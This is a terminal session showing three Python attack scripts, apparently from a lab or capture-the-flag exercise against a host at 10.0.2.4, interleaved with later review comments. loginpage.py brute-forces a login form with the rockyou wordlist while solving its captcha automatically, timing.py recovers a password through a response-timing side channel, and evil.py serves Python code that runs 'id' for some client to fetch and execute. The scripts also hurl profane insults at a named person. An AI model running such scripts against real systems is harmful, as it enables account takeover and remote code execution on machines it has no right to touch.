- $ ls *.py
- evil.py loginpage.py timing.py
- clin_is_awesome@clin-is-awesome:~$ cat loginpage.py
- import requests
- import json
def checkint(s):
    """Report whether ``int(s)`` succeeds.

    Returns True when ``int()`` accepts *s* and False when it raises
    ValueError. Any other exception (for example TypeError for None)
    propagates to the caller.
    """
    try:
        int(s)
    except ValueError:
        return False
    else:
        return True
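# Operators the captcha answer may be computed with. The operands and the
# operator arrive in the server's JSON reply, so they are untrusted input to
# this script. The earlier eval() of v1 + op + v2 validated only the operands;
# the 'operator' field went into eval() unchecked, which let the responding
# host run arbitrary Python on the machine running this script. A fixed
# lookup table removes that path.
_CAPTCHA_OPS = {
    '+': lambda a, b: a + b,
    '-': lambda a, b: a - b,
    '*': lambda a, b: a * b,
    '/': lambda a, b: a / b,
}

s = requests.Session()
capcha = 'fuckcolin'
password = 'colinisadick'
success = False
# NOTE(review): the paste lost its indentation; the nesting below is the most
# plausible reading of the original - confirm against the author's file.
with open('/home/clin_is_awesome/rockyou.txt', 'r') as fin:
    for line in fin:
        # Each request carries the answer to the challenge returned by the
        # previous reply together with the current candidate password.
        payload = {'capcha': capcha, 'password': password}
        response = s.post('http://10.0.2.4/ajax_login_capcha', data=payload)
        j = response.json()
        if j['success'] == True:
            break
        v1 = j['value1']
        v2 = j['value2']
        op = j['operator']
        # The endpoint hands out both operands and the operator in machine-
        # readable form, so this captcha does not slow automated guessing;
        # server-side rate limiting or lockout is what would.
        op_key = op.strip() if hasattr(op, 'strip') else op
        solve = _CAPTCHA_OPS.get(op_key)
        # An unknown operator or a non-integer operand leaves the previous
        # answer in place, as a failed operand check did before.
        if solve is not None and checkint(v1) and checkint(v2):
            capcha = solve(int(v1), int(v2))
        password = line.strip()
# These lines run whether or not the loop ended on a success reply.
print('I win and clin can get fucked')
print('password: ' + password)
print(j)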
- clin_is_awesome@clin-is-awesome:~$ cat timing.py
- import socket
- import sys
- import time
- #print >>sys.stderr, 'connecting to %s port %s' % server_address
def makeGuess(guess):
    """Send *guess* to the service and report whether the reply was slow.

    Opens a TCP connection to 10.0.2.4:19391, reads once, sends the guess,
    and times the interval until the next read returns. Returns True when
    that interval exceeds 0.1 seconds, otherwise False. Any reply that does
    not contain 'Invalid Password' is printed.

    NOTE(review): a single sample against a fixed threshold is the only
    signal used, so the result is meaningful only if the service's reply
    time depends on the guess. A constant-time comparison on the service
    side (e.g. hmac.compare_digest) removes that dependence.
    NOTE(review): the paste lost its indentation; the 'Invalid Password'
    check is placed after the finally block here - confirm.
    """
    target = ('10.0.2.4', 19391)
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    slow_reply = False
    conn.connect(target)
    try:
        # First read consumes whatever the service sends before the guess.
        response = conn.recv(1024).decode()
        started = time.time()
        conn.sendall(guess.encode())
        response = conn.recv(1024).decode()
        finished = time.time()
        if finished - started > 0.1:
            print('successfull guess: ' + guess)
            slow_reply = True
    finally:
        conn.close()
    if 'Invalid Password' not in response:
        print(response)
    return slow_reply
# Extend the recovered prefix one letter at a time, keeping any candidate
# that makeGuess() reports as a slow reply.
# NOTE(review): indentation was lost in the paste; the give-up check is read
# as belonging to the while body, not the for body - confirm.
pw = ''
chars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
clinsucks = False
found = False
while not clinsucks:
    for char in chars:
        test = pw + char
        if makeGuess(test):
            pw, found = test, True
    # clinsucks is never assigned again and found is never cleared, so this
    # break is the only way out of the loop.
    if not found:
        print("didn't find squat. Giving up")
        break
- clin_is_awesome@clin-is-awesome:~$ cat evil.py
- import cherrypy
- import os
- import subprocess
class HelloWorld(object):
    """CherryPy application exposing a single handler, ``status_py``."""

    @cherrypy.expose
    def status_py(self):
        """Return a fixed string of Python source as the response body.

        The returned text, if executed, runs ``id`` through
        ``subprocess.check_output`` and prints the output.

        NOTE(review): presumably some client fetches this text and executes
        it; that client is not shown here. Any component that downloads
        code over HTTP and runs it gives whoever controls the URL code
        execution, so such a fetch should pin its origin and verify
        integrity before executing.
        """
        body = "import subprocess; foo = subprocess.check_output(['id'], stderr=subprocess.STDOUT); print(foo)"
        return body
# Serve HelloWorld on TCP port 34321. server.socket_host is not set here, so
# CherryPy's default bind address applies.
server_settings = {'server.socket_port': 34321}
cherrypy.config.update(server_settings)
cherrypy.engine.restart()
cherrypy.quickstart(HelloWorld())